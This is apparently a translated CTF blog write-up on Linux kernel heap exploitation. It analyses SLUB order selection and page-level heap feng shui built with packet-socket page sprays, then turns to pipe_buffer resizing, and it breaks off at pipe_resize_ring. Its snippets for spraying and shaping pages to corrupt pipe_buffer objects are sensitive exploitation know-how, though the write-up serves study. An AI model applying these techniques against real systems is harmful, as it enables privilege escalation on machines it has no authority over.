Say yes to pipe_buffer!


Preface

This all started with a one-line reply from 墨晚鸢. I haven't tried to dig up anything new here; this is mostly a restatement of 墨晚鸢's material, organized in the way I understand it best. You may notice the tags also include io_uring, the focus of the previous article, so let's start there.

10,000-word warning!!!

Limitations of io_uring for heap spraying

int __io_account_mem(struct user_struct *user, unsigned long nr_pages)
{
    unsigned long page_limit, cur_pages, new_pages;

    if (!nr_pages)
        return 0;

    /* Don't allow more pages than we can safely lock */
    page_limit = rlimit(RLIMIT_MEMLOCK) >> PAGE_SHIFT;

    cur_pages = atomic_long_read(&user->locked_vm);
    do {
        new_pages = cur_pages + nr_pages;
        if (new_pages > page_limit)
            return -ENOMEM;
    } while (!atomic_long_try_cmpxchg(&user->locked_vm,
                                      &cur_pages, new_pages));
    return 0;
}

After one round of heap spraying, calling update to modify the contents returned error -12 (ENOMEM). The cause is in the function above: new_pages exceeded the number of pages that can safely be locked, i.e. new_pages > page_limit.

This function is ultimately reached from io_sqe_buffer_register, so unfortunately the limit already applies when the io_uring buffers are registered. When we face the usual large-scale sprays — 4096 allocations and the like — io_uring starts to fall short.

That shortcoming aside, io_uring's performance is still satisfactory.
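A quick way to see how tight this budget is: a minimal user-space sketch (standard POSIX APIs only, my own illustration) printing the current RLIMIT_MEMLOCK and the page count it translates to. On many distros the default is only a few MiB — nowhere near a 4096-buffer spray.

#include <stdio.h>
#include <sys/resource.h>

int main(void)
{
    struct rlimit rl;

    /* this is the same limit __io_account_mem() checks via
     * rlimit(RLIMIT_MEMLOCK) >> PAGE_SHIFT */
    if (getrlimit(RLIMIT_MEMLOCK, &rl) != 0) {
        perror("getrlimit");
        return 1;
    }

    /* assuming PAGE_SHIFT == 12 (4 KiB pages) */
    printf("RLIMIT_MEMLOCK: %llu bytes (%llu pages)\n",
           (unsigned long long)rl.rlim_cur,
           (unsigned long long)(rl.rlim_cur >> 12));
    return 0;
}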

Source analysis of slab allocation

As is well known, slab pages come from the buddy system, and the final allocation happens in alloc_slab_page. Since the buddy system allocates in units of PAGE_SIZE * 2^order, where that order comes from matters a great deal.

static inline unsigned int oo_order(struct kmem_cache_order_objects x)
{
    return x.x >> OO_SHIFT;
}

static inline struct slab *alloc_slab_page(gfp_t flags, int node,
        struct kmem_cache_order_objects oo)
{
    struct folio *folio;
    struct slab *slab;
    unsigned int order = oo_order(oo);

    if (node == NUMA_NO_NODE)
        folio = (struct folio *)alloc_pages(flags, order);
    else
        folio = (struct folio *)__alloc_pages_node(node, flags, order);

    if (!folio)
        return NULL;

    slab = folio_slab(folio);
    __folio_set_slab(folio);
    /* Make the flag visible before any changes to folio->mapping */
    smp_wmb();
    if (page_is_pfmemalloc(folio_page(folio, 0)))
        slab_set_pfmemalloc(slab);

    return slab;
}

As shown, alloc_slab_page gets its order from oo, which is a member of struct kmem_cache.

The kmem_cache_create_usercopy flow

kmem_cache_create_usercopy registers a cache, so the cache will eventually get a slab of its own — but that slab is only allocated the first time an object is requested from the cache. kmem_cache_create_usercopy itself mainly initializes the cache, including the order we care about.

Since the first half of the call path has no direct bearing on order, here is just the call chain, without pasting source to save space:

kmem_cache_create_usercopy=>create_cache=>__kmem_cache_create=>kmem_cache_open=>calculate_sizes

The calculate_sizes function

static int calculate_sizes(struct kmem_cache *s)
{
slab_flags_t flags = s->flags;
unsigned int size = s->object_size;
unsigned int order;

... ...
order = calculate_order(size);

if ((int)order < 0)
return 0;

s->allocflags = 0;
if (order)
s->allocflags |= __GFP_COMP;

if (s->flags & SLAB_CACHE_DMA)
s->allocflags |= GFP_DMA;

if (s->flags & SLAB_CACHE_DMA32)
s->allocflags |= GFP_DMA32;

if (s->flags & SLAB_RECLAIM_ACCOUNT)
s->allocflags |= __GFP_RECLAIMABLE;

/*
* Determine the number of objects per slab
*/
s->oo = oo_make(order, size);
s->min = oo_make(get_order(size), size);

return !!oo_objects(s->oo);
}

The final lines are where oo gets assigned, so naturally the next stop is calculate_order to untangle the logic.

The calculate_order function

static inline int calculate_order(unsigned int size)
{
unsigned int order;
unsigned int min_objects;
unsigned int max_objects;
unsigned int nr_cpus;

/*
* Attempt to find best configuration for a slab. This
* works by first attempting to generate a layout with
* the best configuration and backing off gradually.
*
* First we increase the acceptable waste in a slab. Then
* we reduce the minimum objects required in a slab.
*/
min_objects = slub_min_objects;
if (!min_objects) {
/*
* Some architectures will only update present cpus when
* onlining them, so don't trust the number if it's just 1. But
* we also don't want to use nr_cpu_ids always, as on some other
* architectures, there can be many possible cpus, but never
* onlined. Here we compromise between trying to avoid too high
* order on systems that appear larger than they are, and too
* low order on systems that appear smaller than they are.
*/
nr_cpus = num_present_cpus();
if (nr_cpus <= 1)
nr_cpus = nr_cpu_ids;
min_objects = 4 * (fls(nr_cpus) + 1);
}
max_objects = order_objects(slub_max_order, size);
min_objects = min(min_objects, max_objects);

while (min_objects > 1) {
unsigned int fraction;

fraction = 16;
while (fraction >= 4) {
order = calc_slab_order(size, min_objects,
slub_max_order, fraction);
if (order <= slub_max_order)
return order;
fraction /= 2;
}
min_objects--;
}

/*
* We were unable to place multiple objects in a slab. Now
* lets see if we can place a single object there.
*/
order = calc_slab_order(size, 1, slub_max_order, 1);
if (order <= slub_max_order)
return order;

/*
* Doh this slab cannot be placed using slub_max_order.
*/
order = calc_slab_order(size, 1, MAX_ORDER, 1);
if (order < MAX_ORDER)
return order;
return -ENOSYS;
}

Note that the final order is produced by calc_slab_order. The min_objects variable is initialized from slub_min_objects, a global meaning the minimum number of objects per slab, which is 0 when not configured. In that case the if block that follows runs: nr_cpus comes from num_present_cpus(), falling back to nr_cpu_ids (the processor count). fls returns the position of the highest set bit, e.g. fls(0) = 0, fls(1) = 1, fls(4) = 3. So with 4 CPUs in the system, min_objects starts out as 4 * (3 + 1) = 16.

~ cat /proc/kallsyms | grep slub_min_objects
ffffffff8a23b2d0 t __cfi_setup_slub_min_objects
ffffffff8a23b2e0 t setup_slub_min_objects
ffffffff8a4348af t __setup_str_setup_slub_min_objects
ffffffff8a45e460 t __setup_setup_slub_min_objects
ffffffff8b3d5fbc b slub_min_objects

------

pwndbg> x/1xw 0xffffffff8b3d5fbc
0xffffffff8b3d5fbc: 0x00000000
pwndbg>
~ cat /proc/kallsyms | grep nr_cpu_ids
ffffffff97f73fa8 D nr_cpu_ids
ffffffff98025f10 T __cfi_setup_nr_cpu_ids
ffffffff98025f20 T setup_nr_cpu_ids
ffffffff990f3098 b rcu_init_geometry.old_nr_cpu_ids

------

pwndbg> x/1xw 0xffffffff97f73fa8
0xffffffff97f73fa8: 0x00000004
pwndbg>

Checking as above shows nr_cpu_ids is 4, so min_objects here is 0x10.

fraction is a fragmentation metric: the leftover space must not exceed slab size / fraction, so the larger fraction is, the less fragmentation the slab tolerates.

The calc_slab_order function

int ilog2(unsigned long v)
{
int l = 0;
while ((1UL << l) < v)
l++;
return l;
}

static __always_inline __attribute_const__ int get_order(unsigned long size)
{
if (__builtin_constant_p(size)) {
if (!size)
return BITS_PER_LONG - PAGE_SHIFT;

if (size < (1UL << PAGE_SHIFT))
return 0;

return ilog2((size) - 1) - PAGE_SHIFT + 1;
}

size--;
size >>= PAGE_SHIFT;
#if BITS_PER_LONG == 32
return fls(size);
#else
return fls64(size);
#endif
}

static inline unsigned int calc_slab_order(unsigned int size,
unsigned int min_objects, unsigned int max_order,
unsigned int fract_leftover)
{
unsigned int min_order = slub_min_order;
unsigned int order;

if (order_objects(min_order, size) > MAX_OBJS_PER_PAGE)
return get_order(size * MAX_OBJS_PER_PAGE) - 1;

for (order = max(min_order, (unsigned int)get_order(min_objects * size));
order <= max_order; order++) {

unsigned int slab_size = (unsigned int)PAGE_SIZE << order;
unsigned int rem;

rem = slab_size % size;

if (rem <= slab_size / fract_leftover)
break;
}
return order;
}

This is the function that finally computes the order. It iterates from the smallest order the slab needs up to the maximum, looking for the order that minimizes slab fragmentation. rem is the fragmentation: the space left over after carving out objects. An order qualifies once rem <= slab_size / fract_leftover.

get_order itself is fairly simple — though this damned thing cost me two solid hours, because I'd opened the wrong file and couldn't make sense of what I was reading. It just returns the smallest order whose span covers size. So taking min_objects = 0x10 from the previous function, for a 0x800-byte object the loop's starting point get_order(0x10 * 0x800) already comes out as order 3.
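To make the numbers concrete, here is a small user-space sketch (my own toy re-implementations of fls and get_order, not the kernel's) reproducing the arithmetic above:

#include <stdio.h>

/* toy fls(): position of the highest set bit, fls(0) = 0, fls(4) = 3 */
static int fls_(unsigned long v)
{
    int n = 0;
    while (v) { n++; v >>= 1; }
    return n;
}

/* toy get_order(): smallest order covering size, assuming PAGE_SHIFT = 12 */
static int get_order_(unsigned long size)
{
    int order = 0;
    while ((0x1000UL << order) < size)
        order++;
    return order;
}

int main(void)
{
    unsigned int nr_cpus = 4;
    unsigned int min_objects = 4 * (fls_(nr_cpus) + 1);

    printf("min_objects = %u\n", min_objects);          /* 16 */
    /* starting order for a 0x800-byte cache: get_order(16 * 0x800) */
    printf("start order = %d\n", get_order_(min_objects * 0x800)); /* 3 */
    return 0;
}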

static inline unsigned int order_objects(unsigned int order, unsigned int size)
{
    return ((unsigned int)PAGE_SIZE << order) / size;
}

static inline struct kmem_cache_order_objects oo_make(unsigned int order,
                                                      unsigned int size)
{
    struct kmem_cache_order_objects x = {
        (order << OO_SHIFT) + order_objects(order, size)
    };

    return x;
}

Finally, oo_make packs the order and object count into the oo member.

The kmem_cache_alloc flow

As shown earlier, kmem_cache_create_usercopy only initializes the members of struct kmem_cache; it does not actually create a slab. The real slab allocation happens on the first object request against the cache — that is, in this section's function.

The call chain here is: kmem_cache_alloc=>__kmem_cache_alloc_lru=>slab_alloc=>slab_alloc_node=>__slab_alloc_node=>new_slab=>allocate_slab=>alloc_slab_page

The __slab_alloc_node function

static void *__slab_alloc_node(struct kmem_cache *s,
        gfp_t gfpflags, int node, unsigned long addr, size_t orig_size)
{
    struct partial_context pc;
    struct slab *slab;
    void *object;

    pc.flags = gfpflags;
    pc.slab = &slab;
    pc.orig_size = orig_size;
    object = get_partial(s, node, &pc);

    if (object)
        return object;

    slab = new_slab(s, gfpflags, node);
    if (unlikely(!slab)) {
        slab_out_of_memory(s, gfpflags, node);
        return NULL;
    }

    object = alloc_single_from_new_slab(s, slab, orig_size);

    return object;
}

The allocation order is clear: first try the partial list; if no object can be returned from there, fall through to new_slab and allocate a fresh slab.

The alloc_single_from_new_slab function

static void *alloc_single_from_new_slab(struct kmem_cache *s,
struct slab *slab, int orig_size)
{
int nid = slab_nid(slab);
struct kmem_cache_node *n = get_node(s, nid);
unsigned long flags;
void *object;


object = slab->freelist;
slab->freelist = get_freepointer(s, object);
slab->inuse = 1;

if (!alloc_debug_processing(s, slab, object, orig_size))
/*
* It's not really expected that this would fail on a
* freshly allocated slab, but a concurrent memory
* corruption in theory could cause that.
*/
return NULL;

spin_lock_irqsave(&n->list_lock, flags);

if (slab->inuse == slab->objects)
add_full(s, n, slab);
else
add_partial(n, slab, DEACTIVATE_TO_HEAD);

inc_slabs_node(s, nid, slab->objects);
spin_unlock_irqrestore(&n->list_lock, flags);

return object;
}

The main work here: pop the object at the head of freelist, then put the slab on the partial list.

The allocate_slab function

new_slab, mentioned above, is essentially a wrapper around this function.

static struct slab *allocate_slab(struct kmem_cache *s, gfp_t flags, int node)
{
struct slab *slab;
struct kmem_cache_order_objects oo = s->oo;
gfp_t alloc_gfp;
void *start, *p, *next;
int idx;
bool shuffle;

... ...

slab = alloc_slab_page(alloc_gfp, node, oo);
if (unlikely(!slab)) {
oo = s->min;
alloc_gfp = flags;
/*
* Allocation may have failed due to fragmentation.
* Try a lower order alloc if possible
*/
slab = alloc_slab_page(alloc_gfp, node, oo);
if (unlikely(!slab))
return NULL;
stat(s, ORDER_FALLBACK);
}

slab->objects = oo_objects(oo);
slab->inuse = 0;
slab->frozen = 0;

account_slab(slab, oo_order(oo), s, flags);

slab->slab_cache = s;

kasan_poison_slab(slab);

start = slab_address(slab);

setup_slab_debug(s, slab, start);

shuffle = shuffle_freelist(s, slab);

if (!shuffle) {
start = fixup_red_left(s, start);
start = setup_object(s, start);
slab->freelist = start;
for (idx = 0, p = start; idx < slab->objects - 1; idx++) {
next = p + s->size;
next = setup_object(s, next);
set_freepointer(s, p, next);
p = next;
}
set_freepointer(s, p, NULL);
}

return slab;
}

For a freshly allocated slab, the first thing initialized is its freelist; per the callers above, right after the objects are linked onto freelist, one of them is handed out and the slab is re-hung on partial.

You can also see this function calling alloc_slab_page, shown at the start of the slab allocation analysis.

Constructing page-level heap feng shui

At last, something actually related to the challenge.

When a driver has an off-by-null or off-by-one bug, my first reaction is the approach from CVE-2021-22555: win with a massive heap spray. But when the challenge's slab comes from kmem_cache_create_usercopy, that becomes a real problem: if the order of the slabs you spray differs from the order of the custom cache, there is only a tiny chance the driver's slab lands adjacent to a sprayed slab. This exploitation technique exists precisely to make such exploits stable.

I had actually seen this technique on Anquanke before but paid no attention at the time, so now I'm learning it properly from 墨晚鸢's blog. Page-level heap feng shui means arranging memory at page granularity. The kernel's page layout is both unknown to us and enormous in state, so in practice the technique boils down to hand-building a fresh, known page-granularity layout.

Having walked through slab allocation above, the buddy system should now be easy to grasp. Its basic principle: allocate in units of 2^order pages; free blocks of the same order form doubly linked lists; when a low order runs dry, a contiguous block is taken from a higher order and split in two — one half goes back on the requested order's list, the other half is returned to the caller. The figure below illustrates allocation at order 2 (image borrowed from the original post):

[figure: buddy system order-2 allocation]

From this, the principle of the technique follows naturally: the two lower-order halves split from a higher-order block are physically contiguous. So we can:

  • Request two contiguous blocks of pages from the buddy system
  • Free one block and allocate from the vulnerable kmem_cache so it takes that block
  • Free the other block and spray the victim kmem_cache so it takes that one

At that point, an off-by-null / off-by-one out of the vulnerable kmem_cache reaches straight into the victim kmem_cache.

Allocating any number of pages at any size

Per the above, we must burn through the low-order pages before anything else, which means we need an API that can request pages of a chosen order. The choice here is the method from CVE-2017-7308.

After creating a socket with protocol PF_PACKET, first call setsockopt() to set PACKET_VERSION to TPACKET_V1 / TPACKET_V2, then call setsockopt() again to submit a PACKET_TX_RING. That produces the following call chain:

__sys_setsockopt=>sock->ops->setsockopt=>packet_setsockopt=>packet_set_ring=>alloc_pg_vec

static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
    unsigned int block_nr = req->tp_block_nr;
    struct pgv *pg_vec;
    int i;

    pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
    if (unlikely(!pg_vec))
        goto out;

    for (i = 0; i < block_nr; i++) {
        pg_vec[i].buffer = alloc_one_pg_vec_page(order);
        if (unlikely(!pg_vec[i].buffer))
            goto out_free_pgvec;
    }

out:
    return pg_vec;

out_free_pgvec:
    free_pg_vec(pg_vec, order, block_nr);
    pg_vec = NULL;
    goto out;
}

Here alloc_pg_vec requests the buffers through alloc_one_pg_vec_page, and the count is req->tp_block_nr. Since req is user-controlled, the number of allocations is controllable.

static char *alloc_one_pg_vec_page(unsigned long order)
{
    char *buffer;
    gfp_t gfp_flags = GFP_KERNEL | __GFP_COMP |
                      __GFP_ZERO | __GFP_NOWARN | __GFP_NORETRY;

    buffer = (char *) __get_free_pages(gfp_flags, order);
    if (buffer)
        return buffer;

    /* __get_free_pages failed, fall back to vmalloc */
    buffer = vzalloc(array_size((1 << order), PAGE_SIZE));
    if (buffer)
        return buffer;

    /* vmalloc failed, lets dig into swap here */
    gfp_flags &= ~__GFP_NORETRY;
    buffer = (char *) __get_free_pages(gfp_flags, order);
    if (buffer)
        return buffer;

    /* complete and utter failure */
    return NULL;
}

alloc_one_pg_vec_page obtains the pages with __get_free_pages.

packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
unsigned int optlen)
{
struct sock *sk = sock->sk;
struct packet_sock *po = pkt_sk(sk);
int ret;

if (level != SOL_PACKET)
return -ENOPROTOOPT;

switch (optname) {
case PACKET_ADD_MEMBERSHIP:
case PACKET_DROP_MEMBERSHIP:
{
struct packet_mreq_max mreq;
int len = optlen;
memset(&mreq, 0, sizeof(mreq));
if (len < sizeof(struct packet_mreq))
return -EINVAL;
if (len > sizeof(mreq))
len = sizeof(mreq);
if (copy_from_sockptr(&mreq, optval, len))
return -EFAULT;
if (len < (mreq.mr_alen + offsetof(struct packet_mreq, mr_address)))
return -EINVAL;
if (optname == PACKET_ADD_MEMBERSHIP)
ret = packet_mc_add(sk, &mreq);
else
ret = packet_mc_drop(sk, &mreq);
return ret;
}

case PACKET_RX_RING:
case PACKET_TX_RING:
{
union tpacket_req_u req_u;
int len;

lock_sock(sk);
switch (po->tp_version) {
case TPACKET_V1:
case TPACKET_V2:
len = sizeof(req_u.req);
break;
case TPACKET_V3:
default:
len = sizeof(req_u.req3);
break;
}
if (optlen < len) {
ret = -EINVAL;
} else {
if (copy_from_sockptr(&req_u.req, optval, len))
ret = -EFAULT;
else
ret = packet_set_ring(sk, &req_u, 0,
optname == PACKET_TX_RING);
}
release_sock(sk);
return ret;
}
... ...
}
}

When optname is PACKET_TX_RING we reach packet_set_ring; and because of how len is selected here, we also need po->tp_version set to TPACKET_V1/TPACKET_V2 beforehand.

case PACKET_VERSION:
{
    int val;

    if (optlen != sizeof(val))
        return -EINVAL;
    if (copy_from_sockptr(&val, optval, sizeof(val)))
        return -EFAULT;
    switch (val) {
    case TPACKET_V1:
    case TPACKET_V2:
    case TPACKET_V3:
        break;
    default:
        return -EINVAL;
    }
    lock_sock(sk);
    if (po->rx_ring.pg_vec || po->tx_ring.pg_vec) {
        ret = -EBUSY;
    } else {
        po->tp_version = val;
        ret = 0;
    }
    release_sock(sk);
    return ret;
}

Changing po->tp_version requires entering this case, hence the two separate setsockopt() calls.
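Putting the two calls together, here is a minimal user-space sketch of the allocation primitive (essentially the create_socket_and_alloc_pages helper used by the final exploit; it needs CAP_NET_RAW, hence the unshare() namespace trick later). tp_block_size chooses the order via get_order(), tp_block_nr the number of blocks; closing the socket later frees the pages through packet_release:

#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_packet.h>

/* allocate `nr` blocks of order get_order(size) from the buddy system;
 * e.g. size = 0x8000 yields order-3 pages. Close the fd to free them. */
static int alloc_pages_via_pgv(unsigned int size, unsigned int nr)
{
    struct tpacket_req req;
    int version = TPACKET_V1;
    int fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);

    if (fd < 0)
        return -1;

    /* first call: set tp_version so packet_set_ring uses the V1/V2 req */
    if (setsockopt(fd, SOL_PACKET, PACKET_VERSION,
                   &version, sizeof(version)) < 0)
        goto err;

    /* second call: submit the ring; alloc_pg_vec() grabs the pages */
    memset(&req, 0, sizeof(req));
    req.tp_block_size = size;          /* controls the order            */
    req.tp_block_nr   = nr;            /* controls how many allocations */
    req.tp_frame_size = 0x1000;
    req.tp_frame_nr   = (size * nr) / 0x1000;

    if (setsockopt(fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req)) < 0)
        goto err;

    return fd;
err:
    close(fd);
    return -1;
}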

static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)
{
struct pgv *pg_vec = NULL;
struct packet_sock *po = pkt_sk(sk);
unsigned long *rx_owner_map = NULL;
int was_running, order = 0;
struct packet_ring_buffer *rb;
struct sk_buff_head *rb_queue;
__be16 num;
int err;
/* Added to avoid minimal code churn */
struct tpacket_req *req = &req_u->req;

rb = tx_ring ? &po->tx_ring : &po->rx_ring;
rb_queue = tx_ring ? &sk->sk_write_queue : &sk->sk_receive_queue;

err = -EBUSY;
if (!closing) {
if (atomic_read(&po->mapped))
goto out;
if (packet_read_pending(rb))
goto out;
}

if (req->tp_block_nr) {
unsigned int min_frame_size;

... ...

err = -ENOMEM;
order = get_order(req->tp_block_size);
pg_vec = alloc_pg_vec(req, order);
... ...
}
... ...
if (closing || atomic_read(&po->mapped) == 0) {
err = 0;
spin_lock_bh(&rb_queue->lock);
swap(rb->pg_vec, pg_vec);
if (po->tp_version <= TPACKET_V2)
swap(rb->rx_owner_map, rx_owner_map);
rb->frame_max = (req->tp_frame_nr - 1);
rb->head = 0;
rb->frame_size = req->tp_frame_size;
spin_unlock_bh(&rb_queue->lock);

swap(rb->pg_vec_order, order);
swap(rb->pg_vec_len, req->tp_block_nr);

rb->pg_vec_pages = req->tp_block_size/PAGE_SIZE;
po->prot_hook.func = (po->rx_ring.pg_vec) ?
tpacket_rcv : packet_rcv;
skb_queue_purge(rb_queue);
if (atomic_read(&po->mapped))
pr_err("packet_mmap: vma is busy: %d\n",
atomic_read(&po->mapped));
}
... ...
out_free_pg_vec:
if (pg_vec) {
bitmap_free(rx_owner_map);
free_pg_vec(pg_vec, order, req->tp_block_nr);
}
out:
return err;
}

The order here is derived from req->tp_block_size, and req is user-controlled, so the order of the requested pages is controllable too. Also note that inside the if (closing || atomic_read(&po->mapped) == 0) branch, rb->pg_vec is swapped with the local pg_vec; on this first call the old ring is empty, so free_pg_vec at the end is never reached and the pages stay allocated.

Freeing

The freeing path is simple: packet_release=>packet_set_ring=>free_pg_vec

static void free_pg_vec(struct pgv *pg_vec, unsigned int order,
                        unsigned int len)
{
    int i;

    for (i = 0; i < len; i++) {
        if (likely(pg_vec[i].buffer)) {
            if (is_vmalloc_addr(pg_vec[i].buffer))
                vfree(pg_vec[i].buffer);
            else
                free_pages((unsigned long)pg_vec[i].buffer,
                           order);
            pg_vec[i].buffer = NULL;
        }
    }
    kfree(pg_vec);
}

As shown, it simply frees every buffer, then the pgv array itself.

static int packet_release(struct socket *sock)
{
    struct sock *sk = sock->sk;
    struct packet_sock *po;
    struct packet_fanout *f;
    struct net *net;
    union tpacket_req_u req_u;

    if (!sk)
        return 0;

    ... ...

    lock_sock(sk);
    if (po->rx_ring.pg_vec) {
        memset(&req_u, 0, sizeof(req_u));
        packet_set_ring(sk, &req_u, 1, 0);
    }

    if (po->tx_ring.pg_vec) {
        memset(&req_u, 0, sizeof(req_u));
        packet_set_ring(sk, &req_u, 1, 1);
    }
    ... ...
}

It's easy to see that both rings go through packet_set_ring, and packet_release passes 1 as the third argument.

static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)

Comparing against the function signature, that argument means we're closing. And since memset(&req_u, 0, sizeof(req_u)) runs just before the call, every field of req is zero, so the allocation branch is skipped — yet the branch doing all the swaps still executes. Because we went through it once at allocation time, rb->pg_vec is non-NULL; it gets swapped into the local pg_vec, and this time free_pg_vec does run at the end, releasing all the pages.

Summary

Once we exhaust the buddy system's low-order pages, every page we request afterwards is physically contiguous, so at that point each setsockopt() effectively hands us a nearly physically contiguous region ("nearly", because the setsockopt() path itself also allocates plenty of structures we don't care about, consuming some buddy pages).

So the workflow is: first spray pages using the method above, then (a condensed code sketch follows the figure below):

  1. Free some of the order-3 pages and have the victim objects claim them
  2. Free one more page and have the vulnerable object claim it
  3. Free some more order-3 pages and let the victim objects claim those as well

[figure: resulting page layout, borrowed from the original post]

This produces the layout shown in the figure above.
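A heavily condensed sketch of that sequence, reusing the alloc_pages_via_pgv() helper sketched earlier (indices and counts here are illustrative, not tuned; create() stands for the challenge driver's allocate ioctl, as wrapped in the full exploit at the end):

#include <unistd.h>

extern int  alloc_pages_via_pgv(unsigned int size, unsigned int nr);
extern void create(unsigned int idx, unsigned int size, char *buf);

void shape_pages(void)
{
    int pgv_fd[0x40];
    int i;

    /* stockpile order-3 blocks once the low orders are drained */
    for (i = 0; i < 0x40; i++)
        pgv_fd[i] = alloc_pages_via_pgv(0x8000, 1);

    /* 1. free some order-3 blocks; victim objects (extended pipe_buffer
     *    arrays) reclaim them via fcntl(F_SETPIPE_SZ) sprays */
    for (i = 0; i < 8; i++)
        close(pgv_fd[i]);

    /* 2. free one more block; the vulnerable kcache_jar slab lands on
     *    it, sandwiched between victim pages */
    close(pgv_fd[8]);
    create(0, 8, "0x196082");

    /* 3. free more order-3 blocks, again reclaimed by victim sprays */
    for (i = 9; i < 16; i++)
        close(pgv_fd[i]);
}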

pipe_buffer

pipe_buffer has shown up many times in earlier posts, but sadly always in simple ways: leaking through its ops pointer, overwriting ops to hijack control flow, or the Dirty Pipe exploitation. Annoyingly, during the CTF I never thought of Dirty Pipe, even though I already had full control over the slab holding pipe_buffer. So this time we go beyond ops and corrupt the page pointer instead.

How pipe_buffer is allocated

#define PIPE_DEF_BUFFERS	16

struct pipe_inode_info *alloc_pipe_info(void)
{
struct pipe_inode_info *pipe;
unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
struct user_struct *user = get_current_user();
unsigned long user_bufs;
unsigned int max_size = READ_ONCE(pipe_max_size);

pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
if (pipe == NULL)
goto out_free_uid;

if (pipe_bufs * PAGE_SIZE > max_size && !capable(CAP_SYS_RESOURCE))
pipe_bufs = max_size >> PAGE_SHIFT;

user_bufs = account_pipe_buffers(user, 0, pipe_bufs);

if (too_many_pipe_buffers_soft(user_bufs) && pipe_is_unprivileged_user()) {
user_bufs = account_pipe_buffers(user, pipe_bufs, PIPE_MIN_DEF_BUFFERS);
pipe_bufs = PIPE_MIN_DEF_BUFFERS;
}

if (too_many_pipe_buffers_hard(user_bufs) && pipe_is_unprivileged_user())
goto out_revert_acct;

pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
GFP_KERNEL_ACCOUNT);

if (pipe->bufs) {
init_waitqueue_head(&pipe->rd_wait);
init_waitqueue_head(&pipe->wr_wait);
pipe->r_counter = pipe->w_counter = 1;
pipe->max_usage = pipe_bufs;
pipe->ring_size = pipe_bufs;
pipe->nr_accounted = pipe_bufs;
pipe->user = user;
mutex_init(&pipe->mutex);
return pipe;
}

out_revert_acct:
(void) account_pipe_buffers(user, pipe_bufs, 0);
kfree(pipe);
out_free_uid:
free_uid(user);
return NULL;
}

Notice that pipe->bufs is allocated with kcalloc, whose first argument is the element count and second the element size; internally the two are multiplied. Both values are known here — 16 and 40 (sizeof(struct pipe_buffer)) — giving 640 bytes.

struct kmem_cache *kmalloc_slab(size_t size, gfp_t flags)
{
    unsigned int index;

    if (size <= 192) {
        if (!size)
            return ZERO_SIZE_PTR;

        index = size_index[size_index_elem(size)];
    } else {
        if (WARN_ON_ONCE(size > KMALLOC_MAX_CACHE_SIZE))
            return NULL;
        index = fls(size - 1);
    }

    return kmalloc_caches[kmalloc_type(flags)][index];
}

Inside kcalloc we eventually land here to pick the cache:

const struct kmalloc_info_struct kmalloc_info[] __initconst = {
INIT_KMALLOC_INFO(0, 0),
INIT_KMALLOC_INFO(96, 96),
INIT_KMALLOC_INFO(192, 192),
INIT_KMALLOC_INFO(8, 8),
INIT_KMALLOC_INFO(16, 16),
INIT_KMALLOC_INFO(32, 32),
INIT_KMALLOC_INFO(64, 64),
INIT_KMALLOC_INFO(128, 128),
INIT_KMALLOC_INFO(256, 256),
INIT_KMALLOC_INFO(512, 512),
INIT_KMALLOC_INFO(1024, 1k),
INIT_KMALLOC_INFO(2048, 2k),
INIT_KMALLOC_INFO(4096, 4k),
INIT_KMALLOC_INFO(8192, 8k),
INIT_KMALLOC_INFO(16384, 16k),
INIT_KMALLOC_INFO(32768, 32k),
INIT_KMALLOC_INFO(65536, 64k),
INIT_KMALLOC_INFO(131072, 128k),
INIT_KMALLOC_INFO(262144, 256k),
INIT_KMALLOC_INFO(524288, 512k),
INIT_KMALLOC_INFO(1048576, 1M),
INIT_KMALLOC_INFO(2097152, 2M)
};

Clearly the selection is kmalloc-cg-1k. However, kmalloc-cg-1k is backed by order-2 pages, while everything above was built around order-3 pages — so if the spray allocated order-2 pages, the success rate would take a serious hit.
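For sizes above 192 the bucket index is simply fls(size - 1), per kmalloc_slab above. A quick sketch of the arithmetic (toy fls again, my own illustration), including the resized case we'll hit in the next section:

#include <stdio.h>

static int fls_(unsigned int v)  /* highest set bit, 1-based */
{
    int n = 0;
    while (v) { n++; v >>= 1; }
    return n;
}

int main(void)
{
    /* 16 pipe_buffers * 40 bytes = 640 -> index 10 -> kmalloc-cg-1k  */
    printf("640   -> index %d\n", fls_(640 - 1));
    /* 64 pipe_buffers * 40 bytes = 0xa00 -> index 12 -> kmalloc-cg-4k */
    printf("0xa00 -> index %d\n", fls_(0xa00 - 1));
    return 0;
}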

Resizing the pipe_buffer allocation

pipe keeps on delivering: fcntl(F_SETPIPE_SZ) lets us change the number of pipe_buffers in a pipe.

static long pipe_set_size(struct pipe_inode_info *pipe, unsigned long arg)
{
unsigned long user_bufs;
unsigned int nr_slots, size;
long ret = 0;

#ifdef CONFIG_WATCH_QUEUE
if (pipe->watch_queue)
return -EBUSY;
#endif

size = round_pipe_size(arg);
nr_slots = size >> PAGE_SHIFT;

if (!nr_slots)
return -EINVAL;

... ...

ret = pipe_resize_ring(pipe, nr_slots);
if (ret < 0)
goto out_revert_acct;

pipe->max_usage = nr_slots;
pipe->nr_accounted = nr_slots;
return pipe->max_usage * PAGE_SIZE;

out_revert_acct:
(void) account_pipe_buffers(pipe->user, nr_slots, pipe->nr_accounted);
return ret;
}

This function derives nr_slots from size and passes it to pipe_resize_ring as the second argument.

int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots)
{
    struct pipe_buffer *bufs;
    unsigned int head, tail, mask, n;

    bufs = kcalloc(nr_slots, sizeof(*bufs),
                   GFP_KERNEL_ACCOUNT | __GFP_NOWARN);
    if (unlikely(!bufs))
        return -ENOMEM;

    spin_lock_irq(&pipe->rd_wait.lock);
    mask = pipe->ring_size - 1;
    head = pipe->head;
    tail = pipe->tail;

    n = pipe_occupancy(head, tail);
    if (nr_slots < n) {
        spin_unlock_irq(&pipe->rd_wait.lock);
        kfree(bufs);
        return -EBUSY;
    }

    ... ...
    return 0;
}

